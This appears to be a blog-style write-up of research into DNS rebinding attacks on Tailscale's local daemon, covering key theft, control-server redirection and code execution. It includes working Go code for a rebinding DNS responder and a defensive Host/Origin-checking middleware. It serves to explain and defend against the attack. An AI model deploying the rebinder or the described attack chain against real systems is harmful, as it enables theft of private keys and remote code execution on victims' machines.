Tailscale is a mesh VPN service: nodes establish WireGuard tunnels to one another on demand. The attack described here runs as JavaScript in the VPN user's browser (the V8 engine in Chrome), so the browser's own protections, such as refusing connections to blocked privileged ports and the Same Origin Policy (SOP), still apply and have to be worked around.
The setup was vulnerable to DNS rebinding. The attacker's domain first resolves to the attacker's web server, which serves the page; the record has a very short TTL, so when the page's script makes its next request the browser resolves the name again and now gets a different address. What would be good to map to? 127.0.0.1 or localhost, of course! The browser still treats the page as the attacker's origin, so SOP does not stop the script from reading the responses it now gets from the victim's own machine.
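To make the rebinding step concrete, here is an added example (not code from the research or from Tailscale) of the authoritative DNS side of the attack: a resolver that answers the first A query for the attacker's name with the attacker's server and every later query with 127.0.0.1, always with TTL 0 so the browser does not cache the first answer. The name rebind.example.test and the address 203.0.113.10 are placeholders; the query builder exists only so the example runs offline.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"net"
	"strings"
	"sync"
)

// Rebinder answers A queries for a hostname the attacker controls: first the
// attacker's server (so the page loads), then the target with TTL 0, so the
// page's next fetch of the same origin lands on the victim's own machine.
type Rebinder struct {
	mu       sync.Mutex
	queries  map[string]int
	attacker net.IP
	target   net.IP
}

func NewRebinder(attacker, target string) *Rebinder {
	return &Rebinder{
		queries:  make(map[string]int),
		attacker: net.ParseIP(attacker).To4(),
		target:   net.ParseIP(target).To4(),
	}
}

// Resolve picks the address to answer for this query of name.
func (r *Rebinder) Resolve(name string) net.IP {
	r.mu.Lock()
	defer r.mu.Unlock()
	n := r.queries[name]
	r.queries[name] = n + 1
	if n == 0 {
		return r.attacker
	}
	return r.target
}

// parseName reads the uncompressed QNAME at off and returns the lower-cased
// dotted name plus the offset just past the terminating zero label.
func parseName(msg []byte, off int) (string, int, error) {
	var labels []string
	for {
		if off >= len(msg) {
			return "", 0, errors.New("truncated name")
		}
		l := int(msg[off])
		off++
		if l == 0 {
			break
		}
		if l&0xC0 != 0 || off+l > len(msg) {
			return "", 0, errors.New("bad label")
		}
		labels = append(labels, string(msg[off:off+l]))
		off += l
	}
	return strings.ToLower(strings.Join(labels, ".")), off, nil
}

// BuildQuery makes a minimal A/IN query (placeholder client for the example).
func BuildQuery(id uint16, name string) []byte {
	msg := make([]byte, 12)
	binary.BigEndian.PutUint16(msg[0:], id)
	binary.BigEndian.PutUint16(msg[2:], 0x0100) // RD set
	binary.BigEndian.PutUint16(msg[4:], 1)      // QDCOUNT
	for _, label := range strings.Split(name, ".") {
		msg = append(msg, byte(len(label)))
		msg = append(msg, label...)
	}
	msg = append(msg, 0)    // end of name
	msg = append(msg, 0, 1) // QTYPE A
	msg = append(msg, 0, 1) // QCLASS IN
	return msg
}

// Respond answers a query with one A record and a zero TTL.
func (r *Rebinder) Respond(query []byte) ([]byte, error) {
	if len(query) < 12 {
		return nil, errors.New("short query")
	}
	name, end, err := parseName(query, 12)
	if err != nil {
		return nil, err
	}
	if end+4 > len(query) {
		return nil, errors.New("truncated question")
	}
	ip := r.Resolve(name)
	resp := append([]byte{}, query[:2]...)      // copy ID
	resp = append(resp, 0x81, 0x80)             // QR, RD, RA; NOERROR
	resp = append(resp, 0, 1, 0, 1, 0, 0, 0, 0) // QD=1 AN=1 NS=0 AR=0
	resp = append(resp, query[12:end+4]...)     // echo the question
	resp = append(resp, 0xC0, 0x0C)             // name: pointer to offset 12
	resp = append(resp, 0, 1, 0, 1)             // type A, class IN
	resp = append(resp, 0, 0, 0, 0)             // TTL 0: never cache
	resp = append(resp, 0, 4)                   // RDLENGTH
	resp = append(resp, ip...)
	return resp, nil
}

// AnswerIP pulls the A record out of a response built by Respond.
func AnswerIP(resp []byte) net.IP {
	if len(resp) < 4 {
		return nil
	}
	return net.IP(resp[len(resp)-4:])
}

func main() {
	r := NewRebinder("203.0.113.10", "127.0.0.1")
	for i := 0; i < 3; i++ {
		resp, err := r.Respond(BuildQuery(uint16(i), "rebind.example.test"))
		if err != nil {
			panic(err)
		}
		fmt.Printf("query %d -> %s\n", i, AnswerIP(resp))
	}
}
```

The zero TTL is the whole trick: browsers and OS resolvers keep their own caches, so the flip to 127.0.0.1 only reaches the page's second fetch if nothing in between holds on to the first answer. A real deployment would wrap Respond in a UDP listener; that part is left out here.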
Since the requests now arrive from localhost, they reach the whole tailscaled API without any authentication: the API trusts the caller's local network position. That gives the attacker the ability to introspect and reconfigure tailscaled, the daemon that configures the service. What can be done with this? Reading the node's private keys, for one.
The same vulnerability opens up much more. A PATCH request to the preferences API changes the control plane server the node talks to, so the attacker can point it at a server they run and get backdoored access to the network the machine is on. The control server also supplies a URL that the client opens in a web browser, and since that URL is just a parameter passed through, it can point at an arbitrary binary on the internet and have it launched. Absolutely amazing.
The catch is the Mark of the Web (MotW): a downloaded executable carries it, so the user is asked whether it may run. But the application can be configured, through the same API, so that the proxy does NOT mark downloads with MotW. The attacker can therefore download an executable onto the machine and use the previous bug to execute it without any further popups.
After getting code execution on the device, they go into how DNS rebinding behaves across browsers and operating systems. The attack they were using worked fine from the local machine but NOT from a remote site in Chrome, because of Chrome's browser protections; Firefox was exploitable from a remote context.
tailscaled also runs a web server at the fixed address 100.100.100.100. That sits in the 100.64.0.0/10 CGNAT range rather than in RFC 1918 space, so browsers do not treat it as a private address and it is reachable via rebinding too. They found the PeerAPI vulnerable to rebinding as well. Tailscale's security model authenticates callers by network position, i.e. by the address a request appears to come from, and that is exactly what DNS rebinding subverts: the request really does come from the local machine, just from a browser running someone else's script. The usual check is to validate the Host header (and Origin, when present) against the names the server expects to be reached by, because a rebound request still carries the attacker's hostname there.
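As an added example of that check (my own code, not Tailscale's fix or API), here is a Go middleware for a localhost service that rejects any request whose Host header, or Origin when a browser sends one, is not one of the names the service is legitimately reached by. The port 41112, the path /api/prefs and the attacker name are placeholders; Probe runs requests through the middleware in-process so the example needs no network.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Names this local service expects to be addressed by. Source IP alone
// cannot tell a rebound request from a legitimate one (both come from a
// browser on this machine), but the browser fills in Host from the URL the
// page actually used, so a rebound request still says "attacker.example".
var allowedHosts = map[string]bool{
	"localhost":       true,
	"127.0.0.1":       true,
	"[::1]":           true,
	"100.100.100.100": true,
}

// HostAllowed reports whether a Host header (optionally host:port) names us.
func HostAllowed(hostHeader string) bool {
	host := hostHeader
	if h, _, err := net.SplitHostPort(hostHeader); err == nil {
		host = h
		if strings.Contains(h, ":") {
			host = "[" + h + "]" // re-bracket IPv6 literals
		}
	}
	return allowedHosts[strings.ToLower(host)]
}

// RejectRebinding refuses requests whose Host, or Origin when present, is
// not one of ours, before the real handler sees them.
func RejectRebinding(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !HostAllowed(r.Host) {
			http.Error(w, "unexpected Host header", http.StatusForbidden)
			return
		}
		if origin := r.Header.Get("Origin"); origin != "" {
			u, err := url.Parse(origin)
			if err != nil || !HostAllowed(u.Host) {
				http.Error(w, "cross-origin request refused", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

// Probe sends one request through the middleware and returns the status
// code. The path /api/prefs is a placeholder, not a real endpoint.
func Probe(host, origin string) int {
	h := RejectRebinding(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK)
	}))
	req := httptest.NewRequest("GET", "http://"+host+"/api/prefs", nil)
	req.Host = host
	if origin != "" {
		req.Header.Set("Origin", origin)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	cases := []struct{ host, origin string }{
		{"127.0.0.1:41112", ""},                               // local GUI client
		{"rebind.attacker.example", ""},                       // rebound browser request
		{"127.0.0.1:41112", "http://rebind.attacker.example"}, // cross-origin from a page
		{"100.100.100.100", "http://100.100.100.100"},         // same-origin web UI
	}
	for _, c := range cases {
		fmt.Printf("Host=%-25s Origin=%-32q -> %d\n", c.host, c.origin, Probe(c.host, c.origin))
	}
}
```

Checking Host closes the rebinding hole because the attacker cannot make the browser send anything else there; checking Origin additionally stops a page on another site from driving the API through CORS-permitted requests. Non-browser clients that omit Origin are unaffected, which matters for a daemon whose legitimate callers are a GUI and a CLI.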
Overall, an interesting piece of research into the VPN and a good illustration of the dangers of DNS rebinding. Good work!